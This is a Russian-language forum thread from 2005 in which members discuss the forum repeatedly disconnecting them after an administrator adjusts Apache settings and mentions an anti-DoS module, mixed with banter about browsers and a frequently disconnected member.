попробуем что-то типа
http://www.nuclearelephant.com/projects/dosevasive/


limits increased, должно быть получше,

убрали keepalive у apache

Alter Ego
02-15-2005, 12:37 AM
limits increased, должно быть получше,

убрали keepalive у apache
А Вы администратор этого сайта?

На качелях...
02-15-2005, 12:41 AM
А Вы администратор этого сайта?

Я так думаю - создатель. По дате судя..

Parachuter
02-15-2005, 01:34 AM
Я так думаю - создатель. По дате судя..
один из...

Народ, а вы каким браузером пользуетесь. У меня так, что в Эксплорере, что в Мазиле - всё ровно и ни разу не скинуло...

tia_buena
02-15-2005, 01:39 AM
один из...

Народ, а вы каким браузером пользуетесь. У меня так, что в Эксплорере, что в Мазиле - всё ровно и ни разу не скинуло... меня тоже ни разу не скинуло , вот сижу и молчу... поделиться совсем нечем

Alter Ego
02-15-2005, 02:02 AM
один из...

Народ, а вы каким браузером пользуетесь. У меня так, что в Эксплорере, что в Мазиле - всё ровно и ни разу не скинуло...
У меня IE. В последнее время выкидывает реже, но выкидывает.

Olezhik
02-15-2005, 02:06 AM
меня тоже ни разу не скинуло , вот сижу и молчу... поделиться совсем нечемIE, Оперу не уважаю там много левой рекламы.

sergey4jc
02-15-2005, 02:09 AM
IE, Оперу не уважаю там много левой рекламы.
Firefox'ом балуешь?

Olezhik
02-15-2005, 02:11 AM
Фирефохьом балуешь?Сугубо для работы а так мне ненравитса.

Zovite kak Hotite
02-15-2005, 07:51 PM
5.48 пм

Вылетела.
А так весь день работало тьфу-туфу-тьфу неплохо.

цепной_кот
02-15-2005, 08:00 PM
5.48 пм

Вылетела.
А так весь день работало тьфу-туфу-тьфу неплохо. Пока ни разу седня не выбросило (тьфу-туфу-тьфу), и в общем работает значительно быстрее. Парф - маладца!

Olezhik
02-15-2005, 08:03 PM
У меня на работе компютер по новея чем дома, с него никогда не слетаю... Вобшем дело вот в чём форум обогнал технологию, ошибок в коде нет сегодня было время повнимательней всё просмотреть... Так что пацаны покупайте новые комьпютэры.

Zovite kak Hotite
02-15-2005, 08:20 PM
А форум нам покупку компютеров никак не спонсирует??? :)

КошЫчка
02-15-2005, 08:29 PM
ага.. а потом догонит и ещё раз спонсирует гыыыыыыыыыыыыы :lol:

Olezhik
02-16-2005, 12:59 AM
И дома что то я не летаю... Значит всиму виной было голосование, тока сняли сразу форум перестал летать...

Anna Arina
02-16-2005, 01:23 AM
ага.. а потом догонит и ещё раз спонсирует гыыыыыыыыыыыыы :lol:
как бы такого спонсера возле себя удержать? что б спонсировал и спонсировал...и ещё и ещё... а ? что? а Вы о чём , Кошечка?

LaFemmeGavrila
02-16-2005, 01:33 AM
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает

tia_buena
02-16-2005, 03:38 AM
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
кидает и кидает
не могу спокойно смотреть на такие мучения


давайте всем форумом Гаврилле на новый компьютер скинемся?

Жалоба
02-16-2005, 03:44 AM
и если мы не скинемся? зачем лишать себя удовольствия лицезреть красиво летящего Гаврилу... ух. :grum:

tia_buena
02-16-2005, 04:04 AM
и если мы не скинемся? зачем лишать себя удовольствия лицезреть красиво летящего Гаврилу... ух. :грум: Как бы он совсем от нас не улетел, в далёкие тёплые форумы где его не будет выкидывать, мне не пережить такую утрату ...:cry:

Parachuter
02-16-2005, 04:57 AM
никуда Гаврила не улетит.
А так, представляю, как бы это выглядело:
"пращайти, даракие мои слаткии друзья - я ни смок выдержить карочи этага биспридела и карочи праизвола, в миня два нет три чилавека всёвремя калам кидаюца и ухажу и низнаю карочи вирнусь кагданибудь или нет..."
Навеки ваш Гаврила